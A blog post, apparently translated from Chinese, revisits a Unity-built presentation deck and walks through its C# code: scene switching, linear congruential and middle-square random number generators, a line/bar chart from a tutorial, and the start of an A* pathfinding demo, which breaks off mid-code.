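    private DOTweenPath path;

    void Start()
    {
        path = GetComponent<DOTweenPath>();
    }

    // Hook this up to a button to replay the path from the beginning
    public void OnClick()
    {
        path.DORestart();
    }
}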

    ]]>
@@ -5013,7 +5013,7 @@ /posts/Unity-%E5%9B%9E%E9%A1%BE%E4%B8%80%E4%B8%8B%E8%AE%A9%E8%80%81%E5%B8%88%E9%9C%87%E6%83%8A%E7%9A%84%20PPT/ - Preface

Let's revisit the PPT I made with Unity back then! It has been so long since I last used Unity; familiar yet strange.

Main Content

Random Numbers

Created when I had just enrolled and was locked in the dorm by the pandemic, right when an online class presentation was due!

1

jpg

Scene Switcher

    jpg

    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.SceneManagement;
    using UnityEngine.UI;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private GameObject scenesControllerUIPrefab;
    [SerializeField] private GameObject leftUIPrefab;
    [SerializeField] private GameObject rightUIPrefab;
    private int scenesNum = 6;
    private int sceneIndex = 1;
    public static ScenesController instance;
    private GameObject UIGameObject;
    private GameObject leftUIGameObject;
    private GameObject rightUIGameObject;

    private bool enterScene = false;
    private bool exitScene = false;
    private float timer = 2f;
    private float waitTime = 1f;
    private float enterSceneTime = 1f;
    private float exitSceneTime = 1f;
    // Start is called before the first frame update
    void Awake()
    {
    if (FindObjectsOfType<ScenesController>().Length > 1)
    {
    Destroy(gameObject);
    return;
    }
    instance = this;
    DontDestroyOnLoad(gameObject);
    initUI();
    // enterScene = true;
    }

    void Update()
    {
    if (!GameObject.Find("Canvas").transform.Find("ScenesControllerUI"))
    {
    timer = enterSceneTime + waitTime;
    initUI();
    // enterScene = true;
    }
    }

    private void initUI()
    {
    Debug.Log("initUI()");
    UIGameObject = Instantiate(scenesControllerUIPrefab);
    UIGameObject.name = "ScenesControllerUI";
    UIGameObject.transform.SetParent(GameObject.Find("Canvas").transform);
    UIGameObject.transform.Find("PriorBtn").GetComponent<Button_UI>().ClickFunc = () => { onPriorBtn(); };
    UIGameObject.transform.Find("NextBtn").GetComponent<Button_UI>().ClickFunc = () => { onNextBtn(); };
    UIGameObject.transform.Find("Text").GetComponent<Text>().text = sceneIndex + "/" + scenesNum;
    }

    private void onNextBtn()
    {
    sceneIndex++;
    if (sceneIndex == scenesNum + 1)
    sceneIndex = 1;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }

    private void onPriorBtn()
    {
    sceneIndex--;
    if (sceneIndex == 0)
    sceneIndex = scenesNum;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }
    }

Spinning Wheel

Each PPT page is a Scene, and a scene switcher marked DontDestroyOnLoad(gameObject); handles switching between them.

jpg

A spinning wheel driven by an Animation component.

2

jpg

Math Formulas

The math formulas are shown as images exported from the online LaTeX formula editor (latexlive.com).

Scrolling Code

jpg

A big pile of code would not fit on one page, so I built a scroll bar.

    <color="#3f93c2">using</color> System;

    <color="#3f93c2">public class</color> <color="#4ec9b0">RandomNumber</color>
    {
    <color="#3f93c2">private ulong</color> maxshort =<color="#b5cea8"> 65536L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">multiplier</color> = <color="#b5cea8">1194211693L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">adder</color> = <color="#b5cea8">12345L</color>;
    <color="#3f93c2">private ulong </color><color="#ffc0c0">randSeed</color>;

    <color="#588841">/// <summary>
    /// 构造函数
    /// </summary></color>
    <color="#3f93c2">public</color> <color="#4ec9b0">RandomNumber</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">multiplier</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">adder</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">randSeed</color> = <color="#b5cea8">0</color>)
    {
    <color="#3f93c2">this</color>.multiplier = <color="#93d9fe">multiplier</color>;
    <color="#3f93c2">this</color>.adder = <color="#93d9fe">adder</color>;
    <color="#d8a0df">if</color> (<color="#93d9fe">randSeed</color> == <color="#b5cea8"> 0</color>)
    <color="#57a648">// 返回自 1970-01-01T00:00:00.000Z 起已经过的毫秒数。</color>
    <color="#3f93c2">this</color>.randSeed = (<color="#3f93c2">ulong</color>)<color="#63ba86">DateTime</color>.Now.<color="#dcdcaa">ToFileTimeUtc</color>();
    <color="#d8a0df">else</color>
    <color="#3f93c2">this</color>.randSeed = <color="#93d9fe">randSeed</color>;
    }

    <color="#588841">/// <summary>
    /// 产生 0 到 n - 1 之间的随机整数
    /// 每次计算时, 用线性同余式计算新的种子 randSeed,
    /// 其高 16 为的随机性较好
    /// 此时得到一个 0 ~ 65535 之间的随机整数,
    /// 再将此随机整数映射到 0 ~ n - 1 范围内.
    /// </summary>
    /// <param </color>name<color="#588841">=</color>"<color="#93d9fe">n</color>"<color="#588841">>产生的随机整数上限</param>
    /// <returns>产生的随机整数</returns></color>
    <color="#3f93c2">public ushort</color> <color="#dcdcaa">Random</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">n</color>)
    {
    randSeed = multiplier * randSeed + adder;
    <color="#d8a0df">return</color> (<color="#3f93c2">ushort</color>)((randSeed >> <color="#b5cea8">48</color>) % <color="#93d9fe">n</color>); <color="#57a648">// 取高 16 位</color>
    }

    <color="#588841">/// <summary>
    /// 产生 [0, 1) 之间的随机浮点数
    /// </summary>
    /// <returns>产生的随机浮点数</returns></color>
    <color="#3f93c2">public double</color> <color="#dcdcaa">fRandom</color>()
    {
    <color="#d8a0df">return</color> <color="#dcdcaa">Random</color>(maxshort) / (<color="#3f93c2">double</color>)maxshort;
    }
    }
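The generator above is a linear congruential generator: because randSeed is a ulong, the modulus $2^{64}$ is applied implicitly by unsigned overflow, and only the top 16 bits of the new seed are used as output:

$x_{n+1} = (a\,x_n + c) \bmod 2^{64}, \quad a = 1194211693,\ c = 12345$

$\text{Random}(n) = \left\lfloor x_{n+1} / 2^{48} \right\rfloor \bmod n$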

To get the syntax highlighting, I filled in the rich-text tags one by one...

    3

    jpg

Creating Random Numbers

I threw together a Scene3Controller class to drive all the logic in this scene; it has a bit of a legacy-mess smell:

• a clock that ticks over in Update()
• random numbers created from randSeed, multiplier, adder and n, following the textbook
• the random numbers are printed to the screen; to get the one-line-every-half-second effect I even had to ask 小迷糊 for help and use a coroutine (IEnumerator). Back in RMXP that was a one-liner, orz.
    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using System.Reflection;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private GameObject inputField;
    [SerializeField] private Button_UI startBtn;
    [SerializeField] private Image startImage;
    [SerializeField] private Image stopImage;
    [SerializeField] private Text screenText;
    [SerializeField] private RectTransform clockPointer;

    private RandomNumber randomNumber = null;
    private ulong multiplier = 1194211693L;
    private ulong adder = 12345L;
    private ulong randSeed = 0;
    private ulong n = 65536L;

    private bool running = false;
    private float timer = 0;

    // Start is called before the first frame update
    void Awake()
    {
    screenText.text = "";
    inputField.transform.Find("randSeed").GetComponent<InputField>().text = "" + randSeed;
    inputField.transform.Find("multiplier").GetComponent<InputField>().text = "" + multiplier;
    inputField.transform.Find("adder").GetComponent<InputField>().text = "" + adder;
    inputField.transform.Find("n").GetComponent<InputField>().text = "" + n;

    startBtn.ClickFunc = () => {
    if (running)
    {
    StopCoroutine("TestProgram");
    }
    else
    {
    try
    {
    multiplier = ulong.Parse(inputField.transform.Find("multiplier").GetComponent<InputField>().text);
    adder = ulong.Parse(inputField.transform.Find("adder").GetComponent<InputField>().text);
    randSeed = ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text);
    n = ulong.Parse(inputField.transform.Find("n").GetComponent<InputField>().text);
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    catch
    {
    Debug.Log("失败!");
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    startBtn.hoverBehaviour_Image = stopImage;
    StartCoroutine("TestProgram");
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    };
    }

    // Update is called once per frame
    void Update()
    {
    try
    {
    if (ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text) == 0)
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(1, 0.75f, 0.75f);
    }
    else
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }
    }
    catch
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }

    if(timer<1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    clockPointer.Rotate(new Vector3(0, 0, -90));
    }

    }

/// <summary>
/// Test program
/// </summary>
    private IEnumerator TestProgram()
    {
    screenText.text = "";
    for (int i=0;i<10;i++)
    {
    screenText.text += "a<size=20>"+ i + "</size>=" + randomNumber.Random2(n) + "\n";
    yield return new WaitForSeconds(.5f);
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    }
    }

    4

    jpg

Middle-Square Method

The middle-square method, written following the textbook; the middle digits of the number are highlighted in blue. The update rule is sketched below.
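With $l = 6$ digits and seed $x_0 = 675248$, the update implemented in the code below squares the seed, left-pads the square to $2l$ digits, and keeps the middle $l$ digits:

$x_{n+1} = \left\lfloor x_n^2 / 10^{\,l/2} \right\rfloor \bmod 10^{l}$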

    jpg

    using System.Collections;
    using System.Collections.Generic;
    using UnityEditor;
    using UnityEngine;
    using UnityEngine.UI;

    public class MiddleSquareMethod : MonoBehaviour
    {
    private int length = 6;
    private ulong num = 675248L;
    private string str = "";
    private Text text;
    private float timer = 0;
    // Start is called before the first frame update
    void Awake()
    {
    text = GetComponent<Text>();
    }

    // Update is called once per frame
    void Update()
    {
    if(timer < 1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    str = "";
    for (int i = 0; i < 2 * length - (num * num).ToString().Length; i++)
    {
    str += "0";
    }
    Debug.Log(str);
    str += (num * num).ToString();
    num = ulong.Parse(str.Substring(length / 2, length));
    text.text = str.Substring(0, length / 2) + "<color=\"#0000ff\">" + str.Substring(length / 2, length) + "</color>" + str.Substring(3 * length / 2, length / 2);
    }
    }
    }

    5

    jpg

Data Visualization

A line-chart and bar-chart setup for Unity, taken from Create a Graph - Unity Tutorial - YouTube.

    jpg

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using CodeMonkey.Utils;

    public class Window_Graph : MonoBehaviour {

    public static Window_Graph instance;

    [SerializeField] private Sprite dotSprite;
    private RectTransform graphContainer;
    private RectTransform labelTemplateX;
    private RectTransform labelTemplateY;
    private RectTransform dashContainer;
    private RectTransform dashTemplateX;
    private RectTransform dashTemplateY;
    private List<GameObject> gameObjectList;
    private List<IGraphVisualObject> graphVisualObjectList;
    private GameObject tooltipGameObject;
    private List<RectTransform> yLabelList;

    // Cached values
    public List<int> valueList;
    private IGraphVisual graphVisual;
    private int maxVisibleValueAmount;
    private Func<int, string> getAxisLabelX;
    private Func<float, string> getAxisLabelY;
    private float xSize;
    [SerializeField] private bool startYScaleAtZero = true;

    private void Awake() {
    instance = this;
    // Grab base objects references
    graphContainer = transform.Find("graphContainer").GetComponent<RectTransform>();
    labelTemplateX = graphContainer.Find("labelTemplateX").GetComponent<RectTransform>();
    labelTemplateY = graphContainer.Find("labelTemplateY").GetComponent<RectTransform>();
    dashContainer = graphContainer.Find("dashContainer").GetComponent<RectTransform>();
    dashTemplateX = dashContainer.Find("dashTemplateX").GetComponent<RectTransform>();
    dashTemplateY = dashContainer.Find("dashTemplateY").GetComponent<RectTransform>();
    tooltipGameObject = graphContainer.Find("tooltip").gameObject;

    gameObjectList = new List<GameObject>();
    yLabelList = new List<RectTransform>();
    graphVisualObjectList = new List<IGraphVisualObject>();

    IGraphVisual lineGraphVisual = new LineGraphVisual(graphContainer, dotSprite, Color.green, new Color(1, 1, 1, .5f));
    IGraphVisual barChartVisual = new BarChartVisual(graphContainer, Color.white, .8f);

    // Set up buttons
    transform.Find("barChartBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(barChartVisual);
    };
    transform.Find("lineGraphBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(lineGraphVisual);
    };

    HideTooltip();

    //// Set up base values
    List<int> valueList = new List<int>() { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    ShowGraph(valueList, barChartVisual, -1, (int _i) => "" + (_i), (float _f) => "" + Mathf.RoundToInt(_f));

    }

    public static void ShowTooltip_Static(string tooltipText, Vector2 anchoredPosition) {
    instance.ShowTooltip(tooltipText, anchoredPosition);
    }

    private void ShowTooltip(string tooltipText, Vector2 anchoredPosition) {
    // Show Tooltip GameObject
    tooltipGameObject.SetActive(true);

    tooltipGameObject.GetComponent<RectTransform>().anchoredPosition = anchoredPosition;

    Text tooltipUIText = tooltipGameObject.transform.Find("text").GetComponent<Text>();
    tooltipUIText.text = tooltipText;

    float textPaddingSize = 4f;
    Vector2 backgroundSize = new Vector2(
    tooltipUIText.preferredWidth + textPaddingSize * 2f,
    tooltipUIText.preferredHeight + textPaddingSize * 2f
    );

    tooltipGameObject.transform.Find("background").GetComponent<RectTransform>().sizeDelta = backgroundSize;

    // UI Visibility Sorting based on Hierarchy, SetAsLastSibling in order to show up on top
    tooltipGameObject.transform.SetAsLastSibling();
    }

    public static void HideTooltip_Static() {
    instance.HideTooltip();
    }

    private void HideTooltip() {
    tooltipGameObject.SetActive(false);
    }

    private void SetGetAxisLabelX(Func<int, string> getAxisLabelX) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGetAxisLabelY(Func<float, string> getAxisLabelY) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, getAxisLabelY);
    }

    private void IncreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount + 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void DecreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount - 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGraphVisual(IGraphVisual graphVisual) {
    ShowGraph(this.valueList, graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void ShowGraph(List<int> valueList, IGraphVisual graphVisual, int maxVisibleValueAmount = -1, Func<int, string> getAxisLabelX = null, Func<float, string> getAxisLabelY = null) {
    this.valueList = valueList;
    this.graphVisual = graphVisual;
    this.getAxisLabelX = getAxisLabelX;
    this.getAxisLabelY = getAxisLabelY;

    if (maxVisibleValueAmount <= 0) {
    // Show all if no amount specified
    maxVisibleValueAmount = valueList.Count;
    }
    if (maxVisibleValueAmount > valueList.Count) {
    // Validate the amount to show the maximum
    maxVisibleValueAmount = valueList.Count;
    }

    this.maxVisibleValueAmount = maxVisibleValueAmount;

    // Test for label defaults
    if (getAxisLabelX == null) {
    getAxisLabelX = delegate (int _i) { return _i.ToString(); };
    }
    if (getAxisLabelY == null) {
    getAxisLabelY = delegate (float _f) { return Mathf.RoundToInt(_f).ToString(); };
    }

    // Clean up previous graph
    foreach (GameObject gameObject in gameObjectList) {
    Destroy(gameObject);
    }
    gameObjectList.Clear();
    yLabelList.Clear();

    foreach (IGraphVisualObject graphVisualObject in graphVisualObjectList) {
    graphVisualObject.CleanUp();
    }
    graphVisualObjectList.Clear();

    graphVisual.CleanUp();

    // Grab the width and height from the container
    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    // Set the distance between each point on the graph
    xSize = graphWidth / (maxVisibleValueAmount + 1);

    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    IGraphVisualObject graphVisualObject = graphVisual.CreateGraphVisualObject(new Vector2(xPosition, yPosition), xSize, tooltipText);
    graphVisualObjectList.Add(graphVisualObject);

    // Duplicate the x label template
    RectTransform labelX = Instantiate(labelTemplateX);
    labelX.SetParent(graphContainer, false);
    labelX.gameObject.SetActive(true);
    labelX.anchoredPosition = new Vector2(xPosition, -7f);
    labelX.GetComponent<Text>().text = getAxisLabelX(i);
    gameObjectList.Add(labelX.gameObject);

    // Duplicate the x dash template
    RectTransform dashX = Instantiate(dashTemplateX);
    dashX.SetParent(dashContainer, false);
    dashX.gameObject.SetActive(true);
    dashX.anchoredPosition = new Vector2(xPosition, -3f);
    gameObjectList.Add(dashX.gameObject);

    xIndex++;
    }

    // Set up separators on the y axis
    int separatorCount = 10;
    for (int i = 0; i <= separatorCount; i++) {
    // Duplicate the label template
    RectTransform labelY = Instantiate(labelTemplateY);
    labelY.SetParent(graphContainer, false);
    labelY.gameObject.SetActive(true);
    float normalizedValue = i * 1f / separatorCount;
    labelY.anchoredPosition = new Vector2(-7f, normalizedValue * graphHeight);
    labelY.GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    yLabelList.Add(labelY);
    gameObjectList.Add(labelY.gameObject);

    // Duplicate the dash template
    RectTransform dashY = Instantiate(dashTemplateY);
    dashY.SetParent(dashContainer, false);
    dashY.gameObject.SetActive(true);
    dashY.anchoredPosition = new Vector2(-4f, normalizedValue * graphHeight);
    gameObjectList.Add(dashY.gameObject);
    }
    }

    public void UpdateValue(int index, int value) {
    float yMinimumBefore, yMaximumBefore;
    CalculateYScale(out yMinimumBefore, out yMaximumBefore);

    valueList[index] = value;

    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    bool yScaleChanged = yMinimumBefore != yMinimum || yMaximumBefore != yMaximum;

    if (!yScaleChanged) {
    // Y Scale did not change, update only this value
float xPosition = xSize + index * xSize; // note: assumes every value is visible, so index equals the visible x index
    float yPosition = ((value - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(value);
    graphVisualObjectList[index].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);
    } else {
    // Y scale changed, update whole graph and y axis labels
    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    graphVisualObjectList[xIndex].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);

    xIndex++;
    }

    for (int i = 0; i < yLabelList.Count; i++) {
float normalizedValue = i * 1f / (yLabelList.Count - 1); // off-by-one fix: labels run 0..separatorCount inclusive, matching ShowGraph
    yLabelList[i].GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    }
    }
    }

    private void CalculateYScale(out float yMinimum, out float yMaximum) {
    // Identify y Min and Max values
    yMaximum = valueList[0];
    yMinimum = valueList[0];

    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    int value = valueList[i];
    if (value > yMaximum) {
    yMaximum = value;
    }
    if (value < yMinimum) {
    yMinimum = value;
    }
    }

    float yDifference = yMaximum - yMinimum;
    if (yDifference <= 0) {
    yDifference = 5f;
    }
    yMaximum = yMaximum + (yDifference * 0.2f);
    yMinimum = yMinimum - (yDifference * 0.2f);

    if (startYScaleAtZero) {
    yMinimum = 0f; // Start the graph at zero
    }
    }

    /*
    * Interface definition for showing visual for a data point
    * */
    private interface IGraphVisual {

IGraphVisualObject CreateGraphVisualObject(Vector2 graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Represents a single Visual Object in the graph
    * */
    private interface IGraphVisualObject {

void SetGraphVisualObjectInfo(Vector2 graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Displays data points as a Bar Chart
    * */
    private class BarChartVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Color barColor;
    private float barWidthMultiplier;

    public BarChartVisual(RectTransform graphContainer, Color barColor, float barWidthMultiplier) {
    this.graphContainer = graphContainer;
    this.barColor = barColor;
    this.barWidthMultiplier = barWidthMultiplier;
    }

    public void CleanUp() {
    }

public IGraphVisualObject CreateGraphVisualObject(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject barGameObject = CreateBar(graphPosition, graphPositionWidth);

    BarChartVisualObject barChartVisualObject = new BarChartVisualObject(barGameObject, barWidthMultiplier);
    barChartVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    return barChartVisualObject;
    }

private GameObject CreateBar(Vector2 graphPosition, float barWidth) {
    GameObject gameObject = new GameObject("bar", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = barColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(barWidth * barWidthMultiplier, graphPosition.y);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.pivot = new Vector2(.5f, 0f);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI barButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    public class BarChartVisualObject : IGraphVisualObject {

    private GameObject barGameObject;
    private float barWidthMultiplier;

    public BarChartVisualObject(GameObject barGameObject, float barWidthMultiplier) {
    this.barGameObject = barGameObject;
    this.barWidthMultiplier = barWidthMultiplier;
    }

public void SetGraphVisualObjectInfo(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = barGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(graphPositionWidth * barWidthMultiplier, graphPosition.y);

    Button_UI barButtonUI = barGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    barButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    barButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };
    }

    public void CleanUp() {
    Destroy(barGameObject);
    }
    }
    }

    /*
    * Displays data points as a Line Graph
    * */
    private class LineGraphVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Sprite dotSprite;
    private LineGraphVisualObject lastLineGraphVisualObject;
    private Color dotColor;
    private Color dotConnectionColor;

    public LineGraphVisual(RectTransform graphContainer, Sprite dotSprite, Color dotColor, Color dotConnectionColor) {
    this.graphContainer = graphContainer;
    this.dotSprite = dotSprite;
    this.dotColor = dotColor;
    this.dotConnectionColor = dotConnectionColor;
    lastLineGraphVisualObject = null;
    }

    public void CleanUp() {
    lastLineGraphVisualObject = null;
    }


public IGraphVisualObject CreateGraphVisualObject(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject dotGameObject = CreateDot(graphPosition);


    GameObject dotConnectionGameObject = null;
    if (lastLineGraphVisualObject != null) {
    dotConnectionGameObject = CreateDotConnection(lastLineGraphVisualObject.GetGraphPosition(), dotGameObject.GetComponent<RectTransform>().anchoredPosition);
    }

    LineGraphVisualObject lineGraphVisualObject = new LineGraphVisualObject(dotGameObject, dotConnectionGameObject, lastLineGraphVisualObject);
    lineGraphVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    lastLineGraphVisualObject = lineGraphVisualObject;

    return lineGraphVisualObject;
    }

    private GameObject CreateDot(Vector2 anchoredPosition) {
    GameObject gameObject = new GameObject("dot", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().sprite = dotSprite;
    gameObject.GetComponent<Image>().color = dotColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = anchoredPosition;
    rectTransform.sizeDelta = new Vector2(11, 11);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI dotButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    private GameObject CreateDotConnection(Vector2 dotPositionA, Vector2 dotPositionB) {
    GameObject gameObject = new GameObject("dotConnection", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = dotConnectionColor;
    gameObject.GetComponent<Image>().raycastTarget = false;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    Vector2 dir = (dotPositionB - dotPositionA).normalized;
    float distance = Vector2.Distance(dotPositionA, dotPositionB);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.sizeDelta = new Vector2(distance, 3f);
    rectTransform.anchoredPosition = dotPositionA + dir * distance * .5f;
    rectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    return gameObject;
    }


    public class LineGraphVisualObject : IGraphVisualObject {

    public event EventHandler OnChangedGraphVisualObjectInfo;

    private GameObject dotGameObject;
    private GameObject dotConnectionGameObject;
    private LineGraphVisualObject lastVisualObject;

    public LineGraphVisualObject(GameObject dotGameObject, GameObject dotConnectionGameObject, LineGraphVisualObject lastVisualObject) {
    this.dotGameObject = dotGameObject;
    this.dotConnectionGameObject = dotConnectionGameObject;
    this.lastVisualObject = lastVisualObject;

    if (lastVisualObject != null) {
    lastVisualObject.OnChangedGraphVisualObjectInfo += LastVisualObject_OnChangedGraphVisualObjectInfo;
    }
    }

    private void LastVisualObject_OnChangedGraphVisualObjectInfo(object sender, EventArgs e) {
    UpdateDotConnection();
    }

public void SetGraphVisualObjectInfo(Vector2 graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = graphPosition;

    UpdateDotConnection();

    Button_UI dotButtonUI = dotGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    dotButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    dotButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };

    if (OnChangedGraphVisualObjectInfo != null) OnChangedGraphVisualObjectInfo(this, EventArgs.Empty);
    }

    public void CleanUp() {
    Destroy(dotGameObject);
    Destroy(dotConnectionGameObject);
    }

    public Vector2 GetGraphPosition() {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    return rectTransform.anchoredPosition;
    }

    private void UpdateDotConnection() {
    if (dotConnectionGameObject != null) {
    RectTransform dotConnectionRectTransform = dotConnectionGameObject.GetComponent<RectTransform>();
    Vector2 dir = (lastVisualObject.GetGraphPosition() - GetGraphPosition()).normalized;
    float distance = Vector2.Distance(GetGraphPosition(), lastVisualObject.GetGraphPosition());
    dotConnectionRectTransform.sizeDelta = new Vector2(distance, 3f);
    dotConnectionRectTransform.anchoredPosition = GetGraphPosition() + dir * distance * .5f;
    dotConnectionRectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    }
    }
    }
    }
    }
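
The enclosing window class and its serialized fields (graphContainer, dotSprite, the label and dash templates) are not part of this excerpt, so here is only a hedged usage sketch of the strategy swap, with the sample values made up for illustration:

    // Hypothetical call site inside the window class, e.g. in its Awake():
    IGraphVisual lineGraphVisual = new LineGraphVisual(graphContainer, dotSprite, Color.green, new Color(1, 1, 1, .5f));
    IGraphVisual barChartVisual = new BarChartVisual(graphContainer, Color.white, .8f);

    List<int> valueList = new List<int> { 5, 98, 56, 45, 30, 22, 17 };
    ShowGraph(valueList, lineGraphVisual, -1, (int _i) => "Day " + (_i + 1));

    // Later, switch the rendering strategy without touching the data:
    SetGraphVisual(barChartVisual);

Because both visuals implement IGraphVisual, ShowGraph never needs to know which chart type it is drawing.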

(Image: slide 6)

The A* Algorithm

I even wrote a blog post about this back then: [Unity-Unity 中的网格系统及 AStar 算法-Zi-Zi’s Journey](../../../../2022/11/11/Unity-Unity 中的网格系统及 AStar 算法/)

(Images: three screenshots)

**Layout**

The assets and color scheme were lifted from the Chess.com homepage. I never actually got to present this deck, so it served as practice.

The background color is #312E2B.

Scene logic

A single hastily written Test class drives all the logic; call it agile development.

• Scene switching: there is only one Unity scene, and each Prefab represents one slide. Pages flip with the mouse as well as the A and D keys.
• Three algorithms are available (see the sketch after this list):
  • Dijkstra
  • A*
  • BFS
• Two chess pieces represent the movement modes: 8 directions and 4 directions. Press Z to toggle.
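
The Pathfinding class itself is not part of this excerpt; the three modes essentially differ in how a node is prioritized in the open list. A minimal sketch of that idea (PathNode fields such as gCost and hopCount, and the helper CalculateDistanceCost, are my assumptions, not the original code):

    // Hypothetical: the mode numbering matches changeMode() below (1 = Dijkstra, 2 = BFS, 3 = A*).
    private int CalculatePriority(PathNode node, PathNode endNode, int mode)
    {
        switch (mode)
        {
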